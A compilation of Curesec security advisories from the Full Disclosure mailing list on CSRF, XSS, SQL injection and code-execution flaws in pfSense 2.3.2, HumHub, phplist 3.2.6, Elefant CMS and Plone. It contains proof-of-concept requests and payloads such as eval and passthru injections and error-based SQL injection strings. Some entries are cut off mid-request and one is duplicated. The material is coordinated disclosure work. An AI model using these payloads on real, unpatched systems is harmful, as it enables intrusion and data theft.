[FD] pfsense 2.3.2: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:pfsense 2.3.2 Fixed in:2.3.3 Fixed Version Link: https://pfsense.org/download/ Vendor Website: https://www.pfsense.org/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 02/06/2017 Disclosed to public: 03/24/2017 Release mode:Coordinated Release CVE: requested via DWF Credits Tim Coen of Curesec GmbH 2. Overview pfsense is an open source firewall. The web interface is written in PHP. In version 2.3.2-RELEASE (amd64), the actions of creating and deleting firewall rules are vulnerable to CSRF, enabling an Attacker to edit these rules with a little bit of social engineering. 3. Details CVSS: Medium; 5.4 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/ PR:N/UI:R/S:U/C:N/I:L/A:L Description: The easyrule.php script is vulnerable to CSRF, which allows an attacker to create or delete firewall rules via CSRF. Proof of Concept: GET /easyrule.php?action=pass&int=LAN&proto=any&src=192.168.1.1&dst=192.168.1.1 &dstport=80&ipproto=inet 4. Solution To mitigate this issue please upgrade at least to version 2.3.3: https://pfsense.org/download/ Please note that a newer version might already be available. 5. Report Timeline 02/06/2017 Informed Vendor about Issue 02/07/2017 Vendor confirms + fixes issues in git 02/20/2017 Vendor relases fix + vendor advisory 03/24/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/pfsense-232-CSRF-198.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] pfsense 2.3.2: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:pfsense 2.3.2 Fixed in:2.3.3 Fixed Version Link: https://pfsense.org/download/ Vendor Website: https://www.pfsense.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 02/06/2017 Disclosed to public: 03/24/2017 Release mode:Coordinated Release CVE: requested via DWF Credits Tim Coen of Curesec GmbH 2. Overview pfsense is an open source firewall. The web interface is written in PHP. In version 2.3.2-RELEASE (amd64), it is vulnerable to reflected XSS. XSS can lead to disclosure of cookies, session tokens etc. 3. Details XSS 1 CVSS: Medium; 6.1 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/ PR:N/UI:R/S:C/C:L/I:L/A:N Description: When performing a package reinstall via the package manager, the "from" and "to" parameter are vulnerable to reflected XSS. Proof of Concept: http://192.168.178.60/pkg_mgr_install.php?mode=reinstallpkg&pkg= pfSense-pkg-arping&from='">&to='"> Note that while the "pkg" parameter must be a valid package, it does not need to actually be installed on the system. Code: pkg_mgr_install.php XSS 2 CVSS: Medium; 4.7 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/ PR:N/UI:R/S:C/C:L/I:L/A:N Description: The pkg_filter Parameter of the pkg.php file is vulnerable to reflected XSS. It should be noted that the xml Parameter must point to an existing xml file, which must contain a field with the type sorting and the include_filtering_inputbox tag set. According to the vendor, the FreeRADIUS package is affected. Proof of Concept: 192.168.10.150/pkg.php?xml=miniupnpd.xml&pkg_filter='"> Code: pkg.php echo " Filter text: "; 4. Solution To mitigate this issue please upgrade at least to version 2.3.3: https://pfsense.org/download/ Please note that a newer version might already be available. 5. Report Timeline 02/06/2017 Informed Vendor about Issue 02/07/2017 Vendor confirms + fixes issues in git 02/20/2017 Vendor relases fix + vendor advisory 03/24/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/pfsense-232-XSS-197.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] pfsense 2.3.2: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:pfsense 2.3.2
Fixed in:2.3.3
Fixed Version Link: https://pfsense.org/download/
Vendor Website: https://www.pfsense.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 02/06/2017
Disclosed to public: 03/24/2017
Release mode:Coordinated Release
CVE: requested via DWF
Credits Tim Coen of Curesec GmbH
2. Overview
pfsense is an open source firewall. The web interface is written in PHP. In
version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code
execution.
It should be noted that by default, only an administrator can access the setup
wizard. By default, administrators have far-reaching permissions via the wizard
and via other functionality. There are however some custom configurations where
this vulnerability could lead to privilege escalation or undesired code
execution.
Unknown to us, this issue was previously discussed on the github page of
opnsense - a fork of pfsense - , although it was not classified as a
vulnerability.
3. Details
CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/
PR:H/UI:N/S:U/C:H/I:H/A:H
When updating a config field, user input is passed to eval. For most config
types the input is sanitized. However, the sanitation can be bypassed and there
is no sanitation for the config type interfaces_selection. Both of these issues
can lead to code execution.
An attacker needs an account with the privilege to use the wizard ("WebCfg -
pfSense wizard subsystem page"). The attack still works even if the privilege
"User - Config - Deny Config Write" is set, which would normally prevent the
user from performing changes on the server or from resetting the admin
password.
To reproduce the issue, visit https://192.168.10.150/wizard.php?xml=
openvpn_wizard.xml, follow the instructions, and at the step that the parameter
"interface" is used, use wan";echo exec("id");" as value.
Note also that the addslashes filter for types other than interfaces_selection
can be bypassed via ${passthru($_GET[x])}.
Proof of Concept:
POST /wizard.php HTTP/1.1 Host: 192.168.10.150 Content-Length: 506 __csrf_magic
=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=
openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&
localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&
dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&
localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&
dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&
nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next -> uid=0(root) gid=0
(wheel) groups=0(wheel)
Code:
/wizard.php function update_config_field($field, $updatetext, $unset,
$arraynum, $field_type) { [...] if($field_type == "interfaces_selection") {
$var = "\$config{$field_conv}"; $text = "if (isset({$var})) unset({$var});";
$text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";"; eval($text);
return; } [..] $text = "\$config" . $field_conv . " = \"" . addslashes
($updatetext) . "\";"; eval($text); }
4. Solution
To mitigate this issue please upgrade at least to version 2.3.3:
https://pfsense.org/download/
Please note that a newer version might already be available.
5. Report Timeline
02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor relases fix + vendor advisory
03/24/2017 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html
--
blog: https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed: https://www.curesec.com/blog/rss.xml
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] HumHub 0.20.1 / 1.0.0-beta.3: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: HumHub 0.20.1 / 1.0.0-beta.3 Fixed in: 1.0.0 Fixed Version https://www.humhub.org/en/download/default/form?version=1.0.0 Link: &type=zip Vendor Website: https://www.humhub.org/ Vulnerability Code Execution Type: RemoteYes Exploitable: Reported to 01/10/2016 vendor: Disclosed to 03/17/2017 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview HumHub is a social media platform written in PHP. In version 0.20.1 as well as 1.0.0-beta.3, it is vulnerable to Code Execution as some functionality allows the uploading of PHP files. Successfull exploitation requires specific server settings. A user account is required as well, but registration is open by default. 3. Details CVSS: High 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C Most of the file uploads of HumHub check the file extension or file type before uploading a file. However, the file upload of the "What's on your mind?"-text box allows upload of arbitrary files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files. This is for example the case with default Apache configurations. Because of this, uploaded files should be checked to not have dangerous file extensions. An account is needed, but the registration is open by default. An admin does have the option to configure what files are allowed here: http:// localhost/humhub-0.20.0/index.php?r=admin%2Fsetting%2Ffile. But by default, all files are allowed (although .htaccess is renamed). It should also be noted that the documentation specifically mentions that the upload directory needs to be protected. However, it is to be assumed that not all users follow this suggestion, especially as there is no warning in the installation process itself. Proof of Concept: POST /humhub-0.20.1/index.php?r=file%2Ffile%2Fupload&objectModel=&objectId= HTTP/1.1 Host: localhost Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-Token: TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw== X-Requested-With: XMLHttpRequest Content-Length: 1080 Content-Type: multipart/form-data; boundary =---101749290911301792911842334968 Cookie: [...] Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -101749290911301792911842334968 Content-Disposition: form-data; name="_csrf" TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw== -101749290911301792911842334968 Content-Disposition: form-data; name="message" -101749290911301792911842334968 Content-Disposition: form-data; name="notifyUserInput" -101749290911301792911842334968 Content-Disposition: form-data; name="containerGuid" 3edb07bd-969f-4da3-a4bc-3e2f92a6474c -101749290911301792911842334968 Content-Disposition: form-data; name="containerClass" humhub\modules\user\ models\User -101749290911301792911842334968 Content-Disposition: form-data; name="fileList" -101749290911301792911842334968 Content-Disposition: form-data; name="files[]"; filename="test.php" Content-Type: application/x-php https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip Please note that a newer version might already be available. 5. Report Timeline 01/10/2016 Informed Vendor about Issue 01/12/2016 Vendor confirms issue 02/10/2016 Vendor requests more time 03/27/2016 Vendor releases fix 03/17/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/HumHub-0201--100-beta3-Code-Execution-196.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] HumHub 1.0.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product: HumHub 1.0.1 and earlier Fixed in: 1.1.1 Fixed Version https://www.humhub.org/en/download/default/form?version=1.1.1 Link: &type=zip Vendor Website: https://www.humhub.org/ Vulnerability XSS Type: RemoteYes Exploitable: Reported to 01/10/2016 vendor: Disclosed to 03/17/2017 public: Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview HumHub is a social media platform written in PHP. In version 1.0.1 and earlier, it is vulnerable to a reflected XSS attack if debugging is enabled, as well as a self-XSS attack. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: When the debug mode is enabled, which it is by default, the UserSearch parameter is vulnerable to reflected XSS. Additionally, the resulting error page discloses all cookies - even httpOnly cookies -, and the contents of the $_SERVER array. Proof of Concept: http://localhost/humhub-0.20.0/index.php?UserSearch[last_login]=alert (1)&r=admin%2Fuser XSS 2: DOM-based Self-XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N There is a reflected DOM-based self-XSS vulnerability in HumHub. It may be possible to exploit this issue via ClickJacking in some browsers. Proof of Concept: Visit the profile of a user: http://localhost/humhub-0.20.0/index.php?r= space%2Fspace&sguid=d2f06d0a-47e1-4549-b469-c8a1df48faca In the "What's on your mind?"-text box enter: '"> 4. Solution To mitigate this issue please upgrade at least to version 1.1.1: https://www.humhub.org/en/download/default/form?version=1.1.1&type=zip Please note that a newer version might already be available. 5. Report Timeline 01/10/2016 Informed Vendor about Issue 01/12/2016 Vendor confirms issue 02/10/2016 Vendor requests more time 08/16/2016 Vendor releases partial fix 09/26/2016 Vendor releases fix 03/27/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/HumHub-101-XSS-195.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phplist 3.2.6: XSS
Security Advisory - Curesec Research Team 1. Introduction Affectedphplist 3.2.6 Product: Fixed in: 3.3.1 Fixed Version https://sourceforge.net/projects/phplist/files/phplist/3.3.1/ Link: phplist-3.3.1.zip/download Vendor Website: https://www.phplist.org/ Vulnerability XSS Type: Remote Yes Exploitable: Reported to 01/10/2017 vendor: Disclosed to02/20/2017 public: Release mode: Coordinated Release CVE:n/a (not requested) Credits Tim Coen of Curesec GmbH 2. Overview phplist is an application to manage newsletters, written in PHP. In version 3.2.6, it is vulnerable to Cross Site Scripting. The application contains one reflected XSS, and multiple persistent XSS vulnerabilities. The persistent XSS vulnerabilities are only exploitable by users with specific privileges. 3. Details Reflected XSS CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N The page parameter is vulnerable to reflected XSS. Proof of Concept: http://localhost/lists/admin/?page=send\'\">alert(8)&id=187&tk =c Persistent XSS CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N Various components of the administration interface are vulnerable to persistent XSS. While a user account is required to exploit these issues, they may be used by less privileged users to escalate their privileges. Persistent XSS: List Name The name of a list is echoed in various locations without encoding, leading to persistent XSS. An account with the privilege to create a list is required. Add new List: http://localhost/lists/admin/?page=editlist&tk=c as name use : list'"> To trigger the payload, visit - Add new subscribers to list: http://localhost/lists/admin/?page=importsimple&list=84&tk =c - Overview of all lists: http://localhost/lists/admin/?page=list&tk=c - List members of list: http://localhost/lists/admin/?page=members&id=3&tk=c - View member (loaded as part of the lists tab): http://localhost/lists/admin/?page= user&id=4 - Creating a Campaign (in step 4): http://localhost/lists/admin/?page =send&id=2&tk=c&tab=Lists Persistent XSS: Subscribe Page Various parameters of the subscribe page - such as the title - are vulnerable to persistent XSS. An account with the privilege to edit the subscribe page is required. Add a new subscribe page: http://localhost/lists/admin/?page=spage as title use: subscribe'"> To trigget the payload: - Visit the subscribe page: http://localhost/lists/index.php?p=subscribe&id=1 - Visit the subscribe page overview: http://localhost/lists/admin/?page=spage Persistent XSS: Bounce Rule The expression parameter of bounce rules is vulnerable to persistent XSS. An account with the privilege to edit bounce rules is required. Add a new bounce rule:http://localhost/lists/admin/?page=bouncerules&type= active as regular expression use: test'"&ht;http://localhost/lists/ admin/?page=bouncerules&type=active 4. Solution To mitigate this issue please upgrade at least to version 3.3.1: https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/ download Please note that a newer version might already be available. 5. Report Timeline 01/10/2017 Informed Vendor about Issue 01/16/2017 Vendor confirms 02/15/2017 Asked Vendor to confirm that new release fixes issues 02/15/2017 Vendor confirms 02/20/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/phplist-326-XSS-194.html -- blog: https://www.curesec.com/blog Atom Feed: https://www.curesec.com/blog/feed.xml RSS Feed: https://www.curesec.com/blog/rss.xml tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phplist 3.2.6: SQL Injection
Security Advisory - Curesec Research Team
1. Introduction
Affectedphplist 3.2.6
Product:
Fixed in: 3.3.1
Fixed Version https://sourceforge.net/projects/phplist/files/phplist/3.3.1/
Link: phplist-3.3.1.zip/download
Vendor Website: https://www.phplist.org/
Vulnerability SQL Injection
Type:
Remote Yes
Exploitable:
Reported to 01/10/2017
vendor:
Disclosed to02/20/2017
public:
Release mode: Coordinated Release
CVE:n/a (not requested)
Credits Tim Coen of Curesec GmbH
2. Overview
phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to SQL injection.
The application contains two SQL injections, one of which is in the
administration area and one which requires no credentials. Additionally, at
least one query is not properly protected against injections. Furthermore, a
query in the administration area discloses some information on the password
hashes of users.
3. Details
SQL Injection 1: Edit Subscription
CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
It is possible for an unauthenticated user to perform an SQL injection when
updating the subscription information of an already subscribed user.
The protection against SQL injection relies on a combination of a custom magic
quotes function which applies addslashes to all input values and a function
which applies htmlspecialchars to all inputs. Additionally, some input values
are cast to integers to prevent injections. addslashes protects against
injections into arguments which are placed into single quotes, while
htmlspecialchars protects against injections into double quotes.
It should be noted that neither addslashes nor htmlspecialchars are recommended
to prevent SQL Injection.
The update functionality is vulnerable to SQL Injection as it uses the key of
POST data, while only values of POST data are escaped via addslashes, but not
keys.
Proof of Concept:
POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=
foo%40example.com HTTP/1.1 Host: localhost Connection: close Content-Length:
209 email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2
or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&
VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27
The proof of concept is chosen for simplicity and will only work if error
messages are displayed to the user. If this is not the case, other techniques
can be used to extract data from the database.
Code:
/lists/admin/subscribelib2.php $lists = ''; if (is_array($_POST['list'])) {
while (list($key, $val) = each($_POST['list'])) { if ($val == 'signup') {
$result = Sql_query("replace into {$GLOBALS['tables']['listuser']}
(userid,listid,entered) values($userid,$key,now())"); # $lists .= " * ".$_POST
["listname"][$key]."\n"; } } }
SQL Injection 2: Sending Campaign (Admin)
CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
When sending a campaign, the sendformat parameter is vulnerable to SQL
injection. The injection takes place into an UPDATE, so the easiest way to
extract data is via error based SQL injection.
An account with the right to send campaigns is required to exploit this issue.
Proof of Concept:
POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1 Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12 Connection: close Content-Length:
323 formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=
http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling
&htmlformatted=auto&sendformat=HTML" or extractvalue(1,version()) -- - &id=2&
status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=
Code:
// /lists/admin/send_core.php:198 $result = Sql_Query( sprintf('update %s set
subject = "%s", fromfield = "%s", tofield = "%s", replyto ="%s", embargo =
"%s", repeatinterval = "%s", repeatuntil = "%s", message = "%s", textmessage =
"%s", footer = "%s", status = "%s", htmlformatted = "%s", sendformat = "%s",
template = "%s" where id = %d', $tables['message'], sql_escape(strip_tags
($messagedata['campaigntitle'])), /* we store the title in the subject field.
Better would be to rename the DB column, but this will do for now */ sql_escape
($messagedata['fromfield']), sql_escape($messagedata['tofield']), sql_escape
($messagedata['replyto']), sprintf('d-d-d d:d', $messagedata['embargo']
['year'], $messagedata['embargo']['month'], $messagedata['embargo']['day'],
$messagedata['embargo']['hour'], $messagedata['embargo']['minute']),
$messagedata['repeatinterval'], sprintf('d-d-d d:d', $messagedata
['repeatuntil']['year'], $messagedata['repeatuntil']['month'], $messagedata
['repeatuntil']['day'], $messagedata['repeatuntil']['hour'], $messagedata
['repeatuntil']['minute']), sql_escape($messagedata['message']), sql_escape
($messagedata['textmessage']), sql_escape($messagedata['footer']), sql_escape
($messagedata['status']), $ht
[FD] Elefant CMS 1.3.12-RC: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Elefant CMS 1.3.12-RC
Fixed in: 1.3.13
Fixed Version https://github.com/jbroadway/elefant/releases/tag/
Link: elefant_1_3_13_rc
Vendor Website:https://www.elefantcms.com/
Vulnerability Code Execution
Type:
Remote Yes
Exploitable:
Reported to09/05/2016
vendor:
Disclosed to 02/02/2017
public:
Release mode: Coordinated Release
CVE: n/a (not requested)
CreditsTim Coen of Curesec GmbH
2. Overview
Elefant is a content managment system written in PHP. In version 1.3.12-RC, it
is vulnerable to code execution because of two different vulnerabilities. It
allows the upload of files with dangerous type, as well as PHP code injection.
An account is required to exploit these issues.
3. Details
Upload of file with dangerous type
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
The file upload forbids the uploading of files with the .php extension, but
allows uploading of files with a number of other dangerous extensions leading
to code execution and XSS.
A user account is required which has the right to upload and manage files. By
default, the editor or admin role have this right.
Proof of Concept:
POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/
form-data; boundary=--multipartformboundary1472116478634 X-Requested-With:
XMLHttpRequest Content-Length: 316 Cookie: PHPSESSID=
57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page=
%2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05 Connection: close
multipartformboundary1472116478634 Content-Disposition: form-data; name
="path" multipartformboundary1472116478634 Content-Disposition:
form-data; name="file"; filename="test.php5" Content-Type: application/x-php http://localhost/designer/add/layout Enter {{passthru('id')}} In the
textarea.
4. Solution
To mitigate this issue please upgrade at least to version 1.3.13.
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Code-Execution-188.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Elefant CMS 1.3.12-RC: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Elefant CMS 1.3.12-RC
Fixed in: 1.3.13
Fixed Version https://github.com/jbroadway/elefant/releases/tag/
Link: elefant_1_3_13_rc
Vendor Website:https://www.elefantcms.com/
Vulnerability Code Execution
Type:
Remote Yes
Exploitable:
Reported to09/05/2016
vendor:
Disclosed to 02/02/2017
public:
Release mode: Coordinated Release
CVE: n/a (not requested)
CreditsTim Coen of Curesec GmbH
2. Overview
Elefant is a content managment system written in PHP. In version 1.3.12-RC, it
is vulnerable to code execution because of two different vulnerabilities. It
allows the upload of files with dangerous type, as well as PHP code injection.
An account is required to exploit these issues.
3. Details
Upload of file with dangerous type
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
The file upload forbids the uploading of files with the .php extension, but
allows uploading of files with a number of other dangerous extensions leading
to code execution and XSS.
A user account is required which has the right to upload and manage files. By
default, the editor or admin role have this right.
Proof of Concept:
POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/
form-data; boundary=--multipartformboundary1472116478634 X-Requested-With:
XMLHttpRequest Content-Length: 316 Cookie: PHPSESSID=
57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page=
%2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05 Connection: close
multipartformboundary1472116478634 Content-Disposition: form-data; name
="path" multipartformboundary1472116478634 Content-Disposition:
form-data; name="file"; filename="test.php5" Content-Type: application/x-php http://localhost/designer/add/layout Enter {{passthru('id')}} In the
textarea.
4. Solution
To mitigate this issue please upgrade at least to version 1.3.13.
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed
02/02/2017 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Code-Execution-188.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Plone: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Plone 5.0.5 Fixed in:Hotfix 20170117 Fixed Version Link: https://plone.org/security/hotfix/20170117 Vendor Contact: secur...@plone.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 01/26/2017 Release mode:Coordinated Release CVE: CVE-2016-7147 Credits Tim Coen of Curesec GmbH 2. Overview Plone is an open source CMS written in python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS as it does not properly encode double quotes. 3. Details CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The search functionality of the management interface is vulnerable to reflected XSS. As the input is echoed into an HMTL attribute, an attacker can use double quotes to escape the current attribute and add new attributes to enter a JavaScript context. Proof of Concept: http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all&; obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec= %3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find 4. Solution To mitigate this issue please apply the hotfix 20170117. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVE 09/06/2016 CVE assigned 09/06/2016 Vendor requests 90 days to release fix 01/10/2017 Contacted Vendor Again, Vendor announces hotfix 01/17/2017 Vendor releases hotfix 01/26/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Plone-XSS-186.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Elefant CMS 1.3.12-RC: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version https://github.com/jbroadway/elefant/releases/tag/ Link: elefant_1_3_13_rc Vendor Website:https://www.elefantcms.com/ Vulnerability CSRF Type: Remote Yes Exploitable: Reported to09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) CreditsTim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to cross site request forgery. If a victim visits a website that contains specifically crafted code while logged into Elefant, an attacker can for example create a new admin account without the victims knowledge. 3. Details CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P There is no CSRF protection for various components, allowing among other the creation of new admin accounts or XSS attacks. Proof of Concept: Create New Admin: http://localhost/user/add"; method ="POST"> XSS: http://localhost/designer/preview"; method="POST"> 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Elefant CMS 1.3.12-RC Fixed in: 1.3.13 Fixed Version https://github.com/jbroadway/elefant/releases/tag/ Link: elefant_1_3_13_rc Vendor Website:https://www.elefantcms.com/ Vulnerability XSS Type: Remote Yes Exploitable: Reported to09/05/2016 vendor: Disclosed to 02/02/2017 public: Release mode: Coordinated Release CVE: n/a (not requested) CreditsTim Coen of Curesec GmbH 2. Overview Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to multiple persistent as well as a reflected XSS issue. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details Persistent XSS: Username CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N The username is echoed in various locations in the administration backend without encoding, leading to persistent XSS vulnerabilities. A user account is required, but the registration is open by default. Proof of Concept: 1. Register a new user (the registration is open by default). 2. Update the profile, as name use: 